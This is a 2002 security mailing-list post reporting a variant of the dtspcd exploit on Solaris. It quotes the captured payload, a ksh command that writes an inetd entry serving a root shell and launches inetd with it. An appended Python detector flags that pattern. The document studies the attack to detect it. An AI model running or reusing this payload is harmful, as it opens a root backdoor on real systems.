variation of the dtspcd exploit?

From: Nathan W. Labadie (ab0781at_private)
Date: Thu Feb 14 2002 - 13:07:10 PST

    Until last week, all the dtspcd exploits I'd seen had been the same
    (inetd, ingreslock, /tmp/x, etc). Looks like there is a new one floating
    around.  The ASCII output looks something like this:
    
    /bin/ksh -c echo 'rje stream tcp nowait root /bin/sh sh -i'> /tmp/z;
    /usr/sbin/inetd -s /tmp/z;
    sleep 10;
    
    A copy of the capture can be downloaded from here:
    http://security.wayne.edu/downloads/dtspcd-1.cap
    
    -- 
    Nathan W. Labadie       | ab0781at_private	
    Sr. Security Specialist | 313/577.2126
    Wayne State University  | 313/577.1338 fax
    C&IT Information Security Office: http://security.wayne.edu
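
A defender-side check for the pattern in the payload quoted above, as an added example that is not part of the original post: it flags an inetd.conf-style entry that runs a shell as root, and an inetd started with a configuration file under a temp directory. The function names and the benign sample are constructed for illustration; the first sample is the ASCII output as quoted in the post.

```python
import re

SHELLS = {"sh", "ksh", "csh", "bash", "tcsh", "zsh"}
TMP_DIRS = ("/tmp/", "/var/tmp/")

# ASCII output as quoted in the post.
POST_PAYLOAD = (
    "/bin/ksh -c echo 'rje stream tcp nowait root /bin/sh sh -i'> /tmp/z;\n"
    "/usr/sbin/inetd -s /tmp/z;\n"
    "sleep 10;\n"
)
# Constructed benign sample: an ordinary service entry and the system config file.
BENIGN = ("echo 'ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd';\n"
          "/usr/sbin/inetd -s /etc/inet/inetd.conf;\n")

def parse_inetd_entry(line):
    """Split an inetd.conf-style line into named fields, or return None."""
    fields = line.split()
    if len(fields) < 6 or fields[1] not in ("stream", "dgram"):
        return None
    keys = ("service", "socktype", "proto", "wait", "user", "server")
    entry = dict(zip(keys, fields[:6]))
    entry["args"] = fields[6:]
    return entry

def inspect_payload(text):
    """Return (rule, detail) findings for a decoded payload string."""
    findings = []
    # Rule 1: a quoted string that parses as an inetd entry running a shell as root.
    for quoted in re.findall(r"'([^']+)'", text):
        entry = parse_inetd_entry(quoted)
        if (entry and entry["user"] == "root"
                and entry["server"].rsplit("/", 1)[-1] in SHELLS):
            findings.append(("root-shell-inetd-entry", entry["service"]))
    # Rule 2: inetd launched with a configuration file in a temp directory.
    for cmd in re.split(r"[;\n]", text):
        words = cmd.split()
        if words and words[0].rsplit("/", 1)[-1] == "inetd":
            for word in words[1:]:
                if word.startswith(TMP_DIRS):
                    findings.append(("inetd-config-in-tmp", word))
    return findings

if __name__ == "__main__":
    for name, sample in (("post", POST_PAYLOAD), ("benign", BENIGN)):
        print(name, inspect_payload(sample))
```

The rules key on the user and server fields and on the config path rather than on the service name or file name, since those differ between the variants the post mentions (ingreslock and /tmp/x earlier, rje and /tmp/z here).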
    